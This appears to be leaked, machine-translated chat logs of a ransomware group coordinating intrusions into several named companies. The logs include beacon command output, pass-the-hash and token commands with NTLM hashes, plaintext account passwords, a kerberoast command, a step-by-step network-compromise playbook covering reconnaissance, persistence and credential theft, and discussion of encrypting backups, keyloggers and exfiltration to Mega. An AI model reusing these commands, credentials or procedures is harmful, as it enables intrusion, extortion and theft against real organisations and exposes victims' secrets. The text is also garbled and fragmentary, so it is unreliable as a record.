cnzhd1-rbs01.saig.frd.global [RODC] jptok1-rbs01.saig.frd.global [RODC] krseo1-rbs01.saig.frd.global [RODC] cnchd1-rbs01.saig.frd.global [RODC] auspt1-rbs01.saig.frd.global [RODC] aumel1-rbs01.saig.frd.global [RODC] ausyd1-rbs01.saig.frd.global [RODC] aucbr1-rbs01.saig.frd.global [RODC] auhob1-rbs1.saig.frd.global [RODC] auhob1-rbs01.saig.frd.global [RODC] auhdc1-rbs01.saig.frd.global [RODC] auper1-rbs01.saig.frd.global [RODC] auade1-rbs01.saig.frd.global [RODC] auwme1-rbs01.saig.frd.global [RODC] ================================================ adm.barsmr0 adm.bisfra0 adm.bremic0 adm.brodan0 adm.brodav1 adm.caupau0 adm.damben0 adm.davjon0 adm.evamar1 adm.fraste1 adm.hauant0 adm.kalnic0 adm.kemrob0 adm.kinzac0 adm.kinzac1 adm.lowrhy0 adm.macpet0 adm.matdmy0 adm.phykev0 adm.rutluq0 adm.soucam1 adm.staric0 adm.taydav1 adm.tedmar0 adm.turime0 adm.wu0dav0 adm.yorgar0 Admin.AVservers admin.DTservice admin.LMS Admin.MOMaction admin.websense1 Admin.White admnav0 Americadpm AUSYDHC-WINCL02$ backup-exec balpro0 cadmin0 dpservice eis_netapp EMEA.SCCM.Admin EMEA.SCCM.Client fsae.service inssvc0 offser0 ops.ji0lei0 ops.kasbri0 ptbackup RBservice rdpservices serqmi0 sqladmin svc.amwebsense svc.cloudlink svc.dpmadmin svc.foldersync svc.lansweeper svc.msmap svc.ncentral svc.netrix svc.OMAdmin svc.sccmcliinst svc.sharegate svc.sharegate2 svc.sharegate3 svc.sharegate4 svc.sharegate5 svc.sharepoint svc.vcauth svc_actifio svc_scanner_chicago SVC_Tenablescan svc_trendmicro svc-amer-ems-search svc-apac-ems-search SVC-CloudEndure svc-emea-ems-search SVC-Global-AD-LDAP SVC-Global-Azure-ADC svc-global-okta-ad SVC-SCCMadmin sv-emea-adm-actifio tasks tresvc0 ukmik-dbsa UKvc4admin vcatladmin0 verisign verisignus walbexec WebAppAdminProd saig.frd.global\adm.fraste1 Access04 saig.frd.global\sqladmin u5t3r saig.frd.global\Americadpm B0b@f3tt saig.frd.global\CATOR-SQLSA T3rm1nal saig.frd.global\tresvc0 3nterprisE saig.frd.global\adm.kinzac0 dr3Amth3At3r ``saiglobal.com Just do not dump again 
have a good weekend thank you all caught up I have what is on Mon by 2 I need a session then and that's it1.done.rtpcompany.com> the wheel to spin a little > I don't understand how you didn't understand that I need a session out of the water if I write you about it in that confu I never understood what session@user8 I never waited for a session from you server: US.ALLOYPOLYMERS.COM hell: 47 alive: 10 closed 10 WINONA.RTPCO.LOCAL by hell: 52 alive:45 closed 45 RTPCO.LOCAL by hell: 106 alive: 90 closed:90 ARMS: RTPCO.LOCAL By hell: 1,076 Alive: 217 WINONA.RTPCO.LOCAL By hell: 65 Alive: 12 US.ALLOYPOLYMERS.COM By hell: 501 Alive: 24 domain vide unshared disks and killed important processes ices have been wiped out ``Turn the wheel a little if yes, I'm waiting for the statistics and winding down the servers, the center and everything else? [+] host called home, sent: 38 bytes beacon> ls E:\Backups\Henderson [*] Tasked beacon to list files in E:\Backups\Henderson [+] host called home, sent: 38 bytes [*] Listing: E:\Backups\Henderson\ Size Type Last Modified Name ---- ---- ------------- ---- 780kb fil 01/15/2021 21:24:43 Henderson.vbm.RQGNN 181gb fil 01/15/2021 23:05:27 HendersonD2020-12-11T220021_396F.vbk.RQGNN 1gb fil 01/15/2021 22:15:23 HendersonD2020-12-12T220035_E54F.vib.RQGNN 2gb fil 01/15/2021 22:16:32 HendersonD2020-12-13T220027_2042.vib.RQGNN 2gb fil 01/15/2021 22:17:32 HendersonD2020-12-14T220020_913C.vib.RQGNN 2gb fil 01/15/2021 22:18:43 HendersonD2020-12-15T220025_23D1.vib.RQGNN 3gb fil 01/15/2021 22:20:21 HendersonD2020-12-16T220028_08E5.vib.RQGNN 2gb fil 01/15/2021 22:21:38 HendersonD2020-12-17T220031_23A6.vib.RQGNN 1gb fil 01/15/2021 22:22:36 HendersonD2020-12-18T220039_A0F6.vib.RQGNN 1gb fil 01/15/2021 22:23:34 HendersonD2020-12-19T220022_EEF4.vib.RQGNN 1gb fil 01/15/2021 22:24:32 HendersonD2020-12-20T220034_3366.vib.RQGNN 1gb fil 01/15/2021 22:25:38 HendersonD2020-12-21T220024_E89B.vib.RQGNN 1gb fil 01/15/2021 22:26:36 
HendersonD2020-12-22T220028_76F2.vib.RQGNN 3gb fil 01/15/2021 22:28:47 HendersonD2020-12-23T220039_6797.vib.RQGNN 63gb fil 01/15/2021 23:01:49 HendersonD2020-12-24T220038_807A.vib.RQGNN 64gb fil 01/15/2021 23:38:37 HendersonD2020-12-31T180035_06A1.vib.RQGNN 1gb fil 01/15/2021 23:06:33 HendersonD2021-01-01T180033_058F.vib.RQGNN 1gb fil 01/15/2021 23:07:40 HendersonD2021-01-02T180037_48E3.vib.RQGNN 2gb fil 01/15/2021 23:09:01 HendersonD2021-01-03T180036_AB87.vib.RQGNN 2gb fil 01/15/2021 23:10:27 HendersonD2021-01-04T180036_232E.vib.RQGNN 2gb fil 01/15/2021 23:11:52 HendersonD2021-01-05T180029_410C.vib.RQGNN 2gb fil 01/15/2021 23:13:07 HendersonD2021-01-06T180029_FE5D.vib.RQGNN 3gb fil 01/15/2021 23:15:05 HendersonD2021-01-07T180031_D080.vib.RQGNN 7gb fil 01/15/2021 23:19:29 HendersonD2021-01-08T180033_9BF8.vib.RQGNN 2gb fil 01/15/2021 23:20:41 HendersonD2021-01-09T180036_A541.vib.RQGNN 1gb fil 01/15/2021 23:21:48 HendersonD2021-01-10T180033_2241.vib.RQGNN 1gb fil 01/15/2021 23:22:58 HendersonD2021-01-11T180034_3739.vib.RQGNN 1gb fil 01/15/2021 23:24:16 HendersonD2021-01-12T180042_43E6.vib.RQGNN 2gb fil 01/15/2021 23:26:05 HendersonD2021-01-13T180025_5427.vib.RQGNN 2gb fil 01/15/2021 23:27:43 HendersonD2021-01-14T180029_951F.vib.RQGNN 1gb fil 01/15/2021 23:28:53 HendersonD2021-01-15T180033_F651.vib.RQGNN 930b fil 01/15/2021 22:14:24 readme.txt ``All the process1 file? 
beacon> ls E:\Backups\Henderson [*] Tasked beacon to list files in E:\Backups\Henderson [+] host called home, sent: 38 bytes [*] Listing: E:\Backups\Henderson\ Size Type Last Modified Name ---- ---- ------------- ---- 780kb fil 01/15/2021 21:24:43 Henderson.vbm.RQGNN 181gb fil 01/15/2021 23:05:27 HendersonD2020-12-11T220021_396F.vbk.RQGNN 1gb fil 01/15/2021 22:15:23 HendersonD2020-12-12T220035_E54F.vib.RQGNN 2gb fil 01/15/2021 22:16:32 HendersonD2020-12-13T220027_2042.vib.RQGNN 2gb fil 01/15/2021 22:17:32 HendersonD2020-12-14T220020_913C.vib.RQGNN 2gb fil 01/15/2021 22:18:43 HendersonD2020-12-15T220025_23D1.vib.RQGNN 3gb fil 01/15/2021 22:20:21 HendersonD2020-12-16T220028_08E5.vib.RQGNN 2gb fil 01/15/2021 22:21:38 HendersonD2020-12-17T220031_23A6.vib.RQGNN 1gb fil 01/15/2021 22:22:36 HendersonD2020-12-18T220039_A0F6.vib.RQGNN 1gb fil 01/15/2021 22:23:34 HendersonD2020-12-19T220022_EEF4.vib.RQGNN 1gb fil 01/15/2021 22:24:32 HendersonD2020-12-20T220034_3366.vib.RQGNN 1gb fil 01/15/2021 22:25:38 HendersonD2020-12-21T220024_E89B.vib.RQGNN 1gb fil 01/15/2021 22:26:36 HendersonD2020-12-22T220028_76F2.vib.RQGNN 3gb fil 01/15/2021 22:28:47 HendersonD2020-12-23T220039_6797.vib.RQGNN 63gb fil 01/15/2021 23:01:49 HendersonD2020-12-24T220038_807A.vib.RQGNN 64gb fil 01/15/2021 23:01:49 HendersonD2020-12-31T180035_06A1.vib 1gb fil 01/15/2021 23:06:33 HendersonD2021-01-01T180033_058F.vib.RQGNN 1gb fil 01/15/2021 23:07:40 HendersonD2021-01-02T180037_48E3.vib.RQGNN 2gb fil 01/15/2021 23:09:01 HendersonD2021-01-03T180036_AB87.vib.RQGNN 2gb fil 01/15/2021 23:10:27 HendersonD2021-01-04T180036_232E.vib.RQGNN 2gb fil 01/15/2021 23:11:52 HendersonD2021-01-05T180029_410C.vib.RQGNN 2gb fil 01/15/2021 23:13:07 HendersonD2021-01-06T180029_FE5D.vib.RQGNN 3gb fil 01/15/2021 23:15:05 HendersonD2021-01-07T180031_D080.vib.RQGNN 7gb fil 01/15/2021 23:19:29 HendersonD2021-01-08T180033_9BF8.vib.RQGNN 2gb fil 01/15/2021 23:20:41 HendersonD2021-01-09T180036_A541.vib.RQGNN 1gb fil 01/15/2021 23:21:48 
HendersonD2021-01-10T180033_2241.vib.RQGNN 1gb fil 01/15/2021 23:22:58 HendersonD2021-01-11T180034_3739.vib.RQGNN 1gb fil 01/15/2021 23:24:16 HendersonD2021-01-12T180042_43E6.vib.RQGNN 2gb fil 01/15/2021 23:26:05 HendersonD2021-01-13T180025_5427.vib.RQGNN 2gb fil 01/15/2021 23:27:43 HendersonD2021-01-14T180029_951F.vib.RQGNN 1gb fil 01/15/2021 23:28:53 HendersonD2021-01-15T180033_F651.vib.RQGNN 930b fil 01/15/2021 22:14:24 readme.txt ``How much is ready?:meat_on_bone:well without the marble beef it's hard to wait chet (if you're going to order then orderwaitWe need to allocate budget for the second food order it's another hour and a half at least(wait for finals with backups even less than half is still alive:man_shrugging:prolly dead)skully and tdservers what cut off?session is alive backups are still encrypted (apparently takotrubili? beacon> shell ping -n 1 10.89.11.40 [*] Tasked beacon to run: ping -n 1 10.89.11.40 [+] host called home, sent: 52 bytes [+] received output: Pinging 10.89.11.40 with 32 bytes of data: Request timed out. Ping statistics for 10.89.11.40: Packets: Sent = 1, Received = 0, Lost = 1 (100% loss), How's the progress on the backups? 20 more minutes, the guys said they ran through the servers - everything is OK, encrypted.) ``` E:Backups -size 15 There ``may be lags for the following reason - it's a virtualulka, it gets encrypted in several threads, and on the disk, where this virtualulka lies, the space freed from backups gets filled with crap at the same time. That's the disk io and does not take out. But it's not sure)) let me try again from the neighboring process with the flag? no, it's 181gb stalled... the rest are still intact... one that's less than a megabyte encrypted how many files? it will encrypt them until monday... let it encrypt them not. 
Directory of E:\ 01/15/2021 09:24 PM Backups 01/15/2021 09:24 PM ProgramData 01/15/2021 09:24 PM 930 readme.txt 01/15/2021 09:24 PM Test 1 File(s) 930 bytes 3 Dir(s) 1,824,136,421,376 bytes free Last time, in the same domain, the backups were monitored for a few more days and there is a script that will quickly fill it all up. what is the disk size? delete and fill it up with crap. let's try to delete it, but it won't be faster. the process is running, but 1 file changed?where's the progress? would it be faster to delete them? what are we doing now? all the other backups in the ex are in progress? backups are in progress, another 10-15% have reformatted esx and snaps? backups are encrypted? domain vide unshared disks and killed important processes? servers: US.ALLOYPOLYMERS.COM by hell: 47 alive: 10 closed 10 WINONA.RTPCO.LOCAL by hell: 52 alive:45 closed 45 RTPCO.LOCAL by hell: 106 alive: 90 shut down: 90 `````` ARMS: RTPCO.LOCAL By hell: 1,076 Alive: 217 WINONA.RTPCO.LOCAL By hell: 65 Alive: 12 US.ALLOYPOLYMERS.COM By hell: 501 Alive: 24 All disks were unshared everywhere, important processes were killed `````` WINONA.RTPCO.LOCAL On one server (WEB4) 16 IPs, 14 pulled in :D by hell: 52 attracted: 45 with live ones, in the list of pinged they are 70, minus 15 ips that are held on 1 hostname = 55 WEB4.winona.rtpco.local [89.0.0.158] - pulled up on different IP WEB4.winona.rtpco.local [89.0.0.152] - pulled up on another IP ip-0-206.sprint-rev.hbci.com [65.162.42.206] - no 445 ip-0-252.sprint-rev.hbci.com [65.162.42.252] - no 445 ip-0-254.sprint-rev.hbci.com [65.162.42.254] - no 445 ip-0-197.sprint-rev.hbci.com [65.162.42.197] - no 445 ip-0-251.sprint-rev.hbci.com [65.162.42.251] - no 445 ip-0-242.sprint-rev.hbci.com [65.162.42.242] - no 445 ip-0-250.sprint-rev.hbci.com [65.162.42.250] - no 445 ``rtpco. 90/90 4 zamapilnu get takmap? 
ni piepni psekni vmikne fly `` US.ALLOYPOLYMERS.COM by hell: 47 alive: 10 Attracted: 6 not attracted: 4, covered AlloyAMMS.us.alloypolymers.com: 10.1.1.231 alloylicweb.us.alloypolymers.com: 10.1.1.238 alloyxenapp.us.alloypolymers.com: 10.1.1.237 alloyapp3.us.alloypolymers.com: 10.1.1.250 ``They're at 445 check psek and other past? ``` 10.89.11.120 - 10.56.0.30 - 10.89.11.26 - 10.56.0.31 - in the list of servers such kutera at all I'm in the log of the pulled in ipi from other domains as resovlit? it's ping - and the issuance of that external-0-206.sprint-rev.hbci.com [65.162.42.206] - no 445 ip-0-252.sprint-rev.hbci.com [65.162.42.252] - no 445 ip-0-254.sprint-rev.hbci.com [65.162.42.254] - no 445 ip-0-197.sprint-rev.hbci.com [65.162.42.197] - no 445 ip-0-251.sprint-rev.hbci.com [65.162.42.251] - no 445 ip-0-242.sprint-rev.hbci.com [65.162.42.242] - no 445 ip-0-250.sprint-rev.hbci.com [65.162.42.250] - no 445 more than 100% as they say in the peoplevot because of this turns out in the list of servers are 52, and in the list of live - 70 ``. 
WEB4.winona.rtpco.local: 89.0.0.66 WEB4.winona.rtpco.local: 89.0.0.160 WEB4.winona.rtpco.local: 89.0.0.159 WEB4.winona.rtpco.local: 89.0.0.158 WEB4.winona.rtpco.local: 89.0.0.157 WEB4.winona.rtpco.local: 89.0.0.156 WEB4.winona.rtpco.local: 89.0.0.155 WEB4.winona.rtpco.local: 89.0.0.154 WEB4.winona.rtpco.local: 89.0.0.153 WEB4.winona.rtpco.local: 89.0.0.152 WEB4.winona.rtpco.local: 65.162.42.250 WEB4.winona.rtpco.local: 65.162.42.242 WEB4.winona.rtpco.local: 65.162.42.197 WEB4.winona.rtpco.local: 65.162.42.254 WEB4.winona.rtpco.local: 65.162.42.252 WEB4.winona.rtpco.local: 65.162.42.251 `````` ip-0-206.sprint-rev.hbci.com [65.162.42.206] - no 445 ip-0-252.sprint-rev.hbci.com [65.162.42.252] - no 445 ip-0-254.sprint-rev.hbci.com [65.162.42.254] - no 445 ip-0-197.sprint-rev.hbci.com [65.162.42.197] - no 445 ip-0-251.sprint-rev.hbci.com [65.162.42.251] - no 445 ip-0-242.sprint-rev.hbci.com [65.162.42.242] - no 445 ip-0-250.sprint-rev.hbci.com [65.162.42.250] - no 445 ````10.89.11.33 10.56.0.30 10.89.11.31 10.5.0.4 10.89.11.39 10.17.1.6 10.89.11.26 10.28.0.5 10.5.0.5 10.58.0.31 89.0.0.81 10.58.0.35 10.89.12.29 10.7.0.25 10.89.11.10 10.58.0.30 10.89.11.22 10.89.11.24 10.5.0.19 10.1.10.10 10.89.11.13 10.7.0.40 10.56.0.31 10.57.0.25 10.89.11.120 10.89.10.12 ``[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=kyyNPrj7yHJvyTG5K) `` make_token ALLOY\Administrator j@mez9olk ``` ``` pth WINONA\dch 876c802a60e4623dae480bf75d215bbc ``` ``` pth RTPCO\Administrator 468b54c4c90c3f6e96486d9f0227540b `````` 185.150.189.165:21328 oRBZ6uRQQXg3EYp855awPPRBVQ8V7MooXcUR ``yeah. 
and also on top, if linux allowed you to zero kill?[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=khC6izSwxJ7zK2oCT) why, there will be nothing left?the bild throw activeladno on nixes then unpack the folder i hope that i already deleted everything from there i also deleted in mega there is a treshell) i did not delete that) fucklists and separate files that were taken out not pour in mega pure files from network delete put this archive in mega[ ](https://mediaeveryone.com/group/rtpcompany-com?msg=fH2KsEoTv697XoKSy) listings, i will add the listings? i do not have more there archive with backups of boring luqdztoszgtqucubfv@upived.online asdergIJW3RETmjite453 ``Give access to the accounts from megitut data collected? Good night) good night tomorrow by 3session in slip files deleted ok for today everything.yesTomorrow work? check your ballymore fell off or not. my offs worked for an hour)) #1-done-rtpcompany-com has a system so you can change the status of the result ok just access to rps apparently)and he is not LA and the first - current last time there was no funny thing, just ran SharpShares` `` [+] received output: Shares for 27L28: [--- Unreadable Shares ---] HP LaserJet Pro M404dn IPC$ [--- Listable Shares ---] ADMIN$ C$ print$ [+] received output: Shares for HENDSTORAGE: [--- Unreadable Shares ---] Gina(HP Color LaserJet CP3525) Gina(HP LaserJet 400 M401dne) HP MFP477 QA Lab IPC$ Matt(HP LaserJet 400 M401dne) Warehouse Office MFP(HP LaserJet 400 MFP M425dn) Warehouse Office(HP LaserJet 400 M401dne) [--- Listable Shares ---] ADMIN$ Apps C$ D$ Distro E$ GPO_Installs InstallApps ISOs Maint Office print$ Shared Users ``and select different groups do we have admin rights there? ``` \30L71.rtpco.local\ADMIN$ - Remote Admin \30L71.rtpco.local\C$ - Default share \30L71.rtpco.local/IPC$ - Remote IPC I understand it correctly, do I have to check 415 machines by name in ad_compacts now? 
from different OU didn't understand it and I asked for respawn session failed at one moment I've played with both dir and lhome from different groups either it gives nothing or access is denied 415 there's jurl, username, password, click on the list, log in to the site, how do you get information from Lastpass? how much access?? everywhere access to the fs is denied and remote tools work, why is it wmic and even if even dir does not give wmic? dir only wmic checked? what does it say? Donald J. Trump (@realDonaldTrump) / Twitter - Mozilla Firefox ======= [control][ctrl] ``He also tweets it #ballymoregroup-com Found a VPN, took off my browser. the passwords from my browser to the VPN didn't work. Installed keylogger and since now on the screen lockscreen - there is a chance to catch a password. while looking in the files on the disk. SearchOutlook.exe isn't looking for anything. golden ticket done, found alive yes, check admin comps (fs, ff) in #1-done-rtpcompany-com spawnas not working under any credentials, under current users removed the shares SharpShares: no listable shares besides print$ ShareFinder: where it says Remote Admin - it won't let me in in #waterway-com check passwords lastpass/logmein, except mharper's I do not see anyone yet, at the same time watching the keylogger But no change, started looking for mozilla on computers where admins are pledged and check the password file from the keylogger write what you have on progress not in that window) again some matyladno now look yyudshp who knows it)))) where it saves the log? no configurations...exactly there, i did not notice it in the toolchain saw the keylogger? 
is there a third-party keylogger worthy of attention? if @user7 has something let him drain it there you seem to have everything there is this conf) `rawint.com ` no dotsink? well work if it flew to what edition of sofosag seems only sofos and winndef` `` 16464 972 LockApp.exe x64 1 BALLYMOREGROUP\rpearce 3988 748 SavService.exe 5184 748 SAVAdminService.exe 5372 748 ALsvc.exe ``whenever there is a hardwindefc, see what else on ps see the red processes``. [+] Determining what EDR products are installed on localhost... [+] host called home, sent: 57 bytes [+] savonaccess.sys Found [+] 1 EDR Products Found! ====================== | Vendor Information | ---------------------- [+] Sophos Found! ``I noticed that edr kvetch does not show all through edr + psst tell me what AV + because your coba was the cleanest show session put your shelkodblya, I had in the old one for some reason came ...-you do not fly? so not yet took silkodblya) and I do not fly by the classical 20 minutes put the scanners do not sleep as well by the way come silkods +- + preferably clean all koba have?+ + there are not even files AD in the confab, apparently a serious AB at the entrance to the baly recommend access to the VPN #ballymoregroup-com and here +1 together with @user7 + here one man # 1-done-rtpcompany-comobe already had two nets to work I, by the way, also seem to have gone stale I do not have clean kobe?add me in #evo-com:man_raising_hand: I'm in place:space_invader:haiprivEveryone hello tomorrow by 5shuyut home with a laptop have triedAll this works on the wind and if you go outside We have two whistles on simki - do not work, two wi-fi sphistki, of which only one works but not enough speed to even open a page in the browser does not work through a smartphone, or as a general There are no options We have tried everything in the network settings in line does not show the available equipment?How to connect them to the computers if Linux does not see them What is the problem with 5 
modems? In any case, the network is not catching Yes a new one? So maybe it is the modem? There is no internet In the personal cabinet goesNo we configured 2 different data that the provider sent mab chet with the modem? if there is internet in the office Leo brought all options but they do not workWhat do we do? Internet we will not have, tried everything (c) Leone The bottom line - I brought 2 whistles in the pictures, they do not work on the Linux (Beeline and Tele2) brought 2 antenna wi-fi, 1 of them received the Linux, and the phone and the laptop gave out and one and the same, does not even load anything. Vpn does not even connect. The second whistle does not work does not see. Phone podkyodyayu cherd wire - does not want to include the modem ubs. The provider, in turn, our side say that everything is clear, the Internet from our side is, if it does not work, wait for the manager at 10 am. you Lena can not make up 5 modems and 5 sims? and how do you want to give out what? No ofk you wanted to give out from the phone?) On the phones They have some man left, who is responsible for our address mobile - modem?fuckin' hell our mobile internet sucks, but the internet guys said they'd do it tomorrow How's your internet situation? Why is everyone getting locked up? I hope you didn't go to the link without a VPN 👍 Anyway, Lenya's got some provider to give us the internet Internet will give, setup will take from one hour Okay, let them give you LTE modems with SIM card kits. it's to LenaThere is maintenance work at the provider, I don't know when it will end Writing from mobile We have no internet in the office Hi, Mon by what time? Yes, that's it yes, everything...I've got a couple more restored to make sure the long slip is on, man_shrugging:then it should also reach the admin...the second one also knocks on the bilder should reach if it goes to the first one... 
beacon> shell ping -n 1 asdasdasdsa.sadasdsadsa.kalarada.com [*] Tasked beacon to run: ping -n 1 asdasdasdsa.sadasdsadsa.kalarada.com [+] host called home, sent: 77 bytes [+] received output: Pinging asdasdasdsa.sadasdsadsa.kalarada.com [195.123.214.148] with 32 bytes of data: Reply from 195.123.214.148: bytes=32 time=131ms TTL=49 Ping statistics for 195.123.214.148: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 131ms, Maximum = 131ms, Average = 131ms `` hmm. the domain works...here's how to ping asdasdasdsa.sadasdsa.domain.com -n 1 I don't mean just check otherwise) `` beacon> shell ping -n 1 kalarada.com [*] Tasked beacon to run: ping -n 1 kalarada.com [+] host called home, sent: 53 bytes [+] received output: Pinging kalarada.com [195.123.214.148] with 32 bytes of data: Reply from 195.123.214.148: bytes=32 time=131ms TTL=49 Ping statistics for 195.123.214.148: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 131ms, Maximum = 131ms, Average = 131ms beacon> shell ping -n 1 www.kalarada.com [*] Tasked beacon to run: ping -n 1 www.kalarada.com [+] host called home, sent: 57 bytes [+] received output: Pinging www.kalarada.com [195.123.214.148] with 32 bytes of data: Reply from 195.123.214.148: bytes=32 time=133ms TTL=49 Ping statistics for 195.123.214.148: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 133ms, Maximum = 133ms, Average = 133ms I`m not sorry) test it) okay, do not touch the domains can not knock for other reasons if there are bots in the network on the backdoor admin - then the domains are alive directly from the car where you run) well, ping from where does not knock knew, but the fact that does not knock for 3 zakrepaty not know what?it means "it will" and if it gives out ipiniknado pinging level 3 domains it is very easy to check I only have 2) to check? 
or you do not have others? why? muncucfarfarisaa which ones are added?) I do not remember the other 2 domains have a mask ``` Adobe autoupdate#41162 1/22/2021 10:43:28 PM Running ``Let's change domains (there's no backups) there's one print server that's restored all the servers are important Why backups? ``` main.crispregional.org 10.1.0.22 https SYSTEM * CRHSBACKUP this is a new crispispisp version of the 10.1.1.22. if you want to copy and paste it into another crisp, it needs to be done before monday, i suggest we finish this today. 1. Gathering initial information about the domain and the environment - Full domain name - DCs list - LA\DA\EA - Password policy - PS - EDR - Systeminfo On the basis of this information we see what kind of network we are looking at: a workgroup with VPN, a lab, a work network. If you can't make a conclusion from step 1, go to step 2. 2. Collecting BP information - ADFind - ADFind trust If the total size of the files is more than 40mb, you need to put them into the archive. After analyzing the AD we make a conclusion about the network type. If it is a workgroup without a visible domain, we skip it and get the next network to work on. If a full-fledged network, move on 3. Gathering additional information about the domain and environment - Browser Dump - Seatbelt - kerberoast, asreproast - DuzzleUP - WinPEAS - Watson - GPP - ShareFinder - Check ZeroLogon all files in the process and logs you put in a folder with the name of the external network domain, under the names corresponding to the utilities you run. You pass the brute-force hashes to team lead 2 4. Additional actions. 
During ShareFinder run, we run persist on the entry point (ONLY IF YOU SUGGESTED IT) - generate a NEW build for EVERY run - hide dll in user folders (preferably appdata and as far away as possible) - run it, check if the dll is not deleted + staska appeared, write to me: hostname, startup rights all files are duplicated in the conf, as well as stored in a separate folder at your local location. Information about DC, LA, DA, EA, and all the passwords found in the process you put in a separate file creds.txt 5. If during or after the ShareFinder, as well as a quick brute-force hash, you get the opportunity to get out of the entry point, then by all means take advantage of it. Such a network gets priority and is not interrupted ``and check the login and passwords without a domain on itproping at least 1 successfulproping all pk from the group of the current user in the domain there is a user with the same name as this admin, but he is not active for a long time in this situation 2-2 is me who is so clever? user 2-2 beacon> shell net user GPJHelp [*] Tasked beacon to run: net user GPJHelp [+] host called home, sent: 47 bytes [+] received output: User name GPJHelp Full Name Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set ?4/?18/?2018 9:47:12 AM Password expires Never Password changeable ??4/?18/?2018 9:47:12 AM Password required No User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon ??4/?18/?2018 11:53:55 AM Logon hours allowed All Local Group Memberships *Administrators Global Group memberships *None The command completed successfully. I don't think so, but his domain often drops out. Was there a VPN as well? Are there any requests going through? 
``` shell ping 192.168.30.42 Pinging 192.168.30.42 with 32 bytes of data: Ping statistics for 192.168.30.42: Packets: Sent = 4, Received = 0, Lost = 4 (100% loss), ````execute-assembly Rubeus.exe kerberoast /format:hashcat /outfile:C:\ProgramData\hashes_rub_all.txt $krb5tgs$23$*Pwwadfssvc$gpj.loc$host``Pass to brute-force write it down in the future and it was most likely disabled. The request will be processed at a domain controller for domain gpj.loc. User name GPJHelp Full Name GPJHelp Comment Helpdesk service account User's comment Country/region code 000 (System Default) Account active No Account expires Never Password last set ?3/?29/?2011 9:04:23 AM Password expires Never Password changeable ??3/?29/?2011 9:04:23 AM Password required Yes User may change password No Workstations allowed All Logon script User profile Home directory Last logon Never Logon hours allowed All Local Group Memberships Global Group memberships *Service Accounts *Domain Users I wanted to check access, but you have to do it if it is not a domain and it's a local account. user 2-3 beacon> shell dir \192.168.120.28\C$ [*] Tasked beacon to run: dir \192.168.120.28\C$ [+] host called home, sent: 54 bytes [+] received output: This user can't sign in because this account is currently disabled. user 2-3 beacon> shell dir \10.200.100.42\C$ [*] Tasked beacon to run: dir \\10.200.100.42\C$ [+] host called home, sent: 53 bytes [+] received output: This user can't sign in because this account is currently disabled. user 2-3 beacon> shell dir \\192.168.140.3\C$ [*] Tasked beacon to run: dir \\192.168.140.3\C$ [+] host called home, sent: 53 bytes [+] received output: This user can't sign in because this account is currently disabled. 
user 2-3 beacon> shell dir \192.168.221.42\C$ [*] Tasked beacon to run: dir \192.168.221.42\C$ [+] host called home, sent: 54 bytes [+] received output: This user can't sign in because this account is currently disabled. `````` beacon> shell dir \\192.168.120.28\C$ [*] Tasked beacon to run: dir \192.168.120.28\C$ [+] host called home, sent: 54 bytes [+] received output: This user can't sign in because this account is currently disabled. ``Check on any host to make sure the accesses are valid. dn:CN=GPJHelp,OU=Users,OU=Admins,DC=gpj,DC=loc >objectClass: top >objectClass: person >objectClass: organizationalPerson >objectClass: user >cn: GPJHelp >sn: Help >description: Helpdesk service account >givenName: GPJ >distinguishedName: CN=GPJHelp,OU=Users,OU=Admins,DC=gpj,DC=loc >instanceType: 4 >whenCreated: 20100203200249.0Z >whenChanged: 20180413150136.0Z >displayName: GPJHelp >uSNCreated: 14194 >memberOf: CN=Service Accounts,OU=Groups,OU=AuthManagement,DC=gpj,DC=loc >uSNChanged: 159601513 >name: GPJHelp >objectGUID: {BFFE42F1-B611-41BD-85FD-7E31917C25C0} >userAccountControl: 66050 >badPwdCount: 1 >codePage: 0 >countryCode: 0 >badPasswordTime: 132127983133838189 >lastLogoff: 0 >lastLogon: 0 >pwdLastSet: 129458774625564022 >primaryGroupID: 513 >objectSid: S-1-5-21-1795611735-3404200554-1966915844-1156 >accountExpires: 9223372036854775807 >logonCount: 0 >sAMAccountName: GPJHelp >sAMAccountType: 805306368 >userPrincipalName: GPJHelp@gpj.loc >lockoutTime: 131681052967595316 >objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=gpj,DC=loc >dSCorePropagationData: 20171016211900.0Z >dSCorePropagationData: 20171016205841.0Z >dSCorePropagationData: 20171016202841.0Z >dSCorePropagationData: 20171016202218.0Z >dSCorePropagationData: 16010714223649.0Z >lastLogonTimestamp: 129125338780643881 >msDS-SupportedEncryptionTypes: 0 ``Domain Controllers:''. 
Domain Controllers: Server Name IP Address ----------- ---------- [+] received output: DETMSDC01 192.168.11.42 LAXMSDC01 192.168.30.42 BNGMSDC01 192.168.110.42 SFOMSDC01 10.200.132.52 DETMSDC02 192.168.11.43 TOKMSDC01 192.168.90.6 SHARMSDC01 10.220.136.40 SYDMSDC01 192.168.101.42 SNGMSDC01 192.168.241.42 NYCMSDC01 10.201.36.42 AUSMSDC01 192.168.221.42 SFOAMSDC01 10.200.164.42 DENMSDC01 10.200.196.42 [+] received output: LONMSDC02 10.210.4.42 BEIMSDC02 192.168.120.28 SHAMSDC02 192.168.140.3 BOSMSDC01 10.200.228.42 HKGMSDC01 192.168.230.42 STURMSDC01 192.168.61.42 PLNMSDC02 10.200.4.42 MELMSDC01 10.220.68.42 SHARMSDC02 10.220.136.42 STURMSDC10 192.168.66.42 STURMSDC20 192.168.67.42 ROCMSDC01 10.200.100.42 SFO2MSDC03 10.200.132.42 STUGMSDC10 192.168.71.18 You can try it directly on the DC, 50% of the time it's a local admin there as well, it should roll on the pc from that group beacon> shell net group "Domain Admins" /dom [*] Tasked beacon to run: net group "Domain Admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain gpj.loc. Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- ADAXES AMoultonADM bigfix ELittleADM JStriberADM pwwDirAdmin TMunsonADM The command completed successfully. 
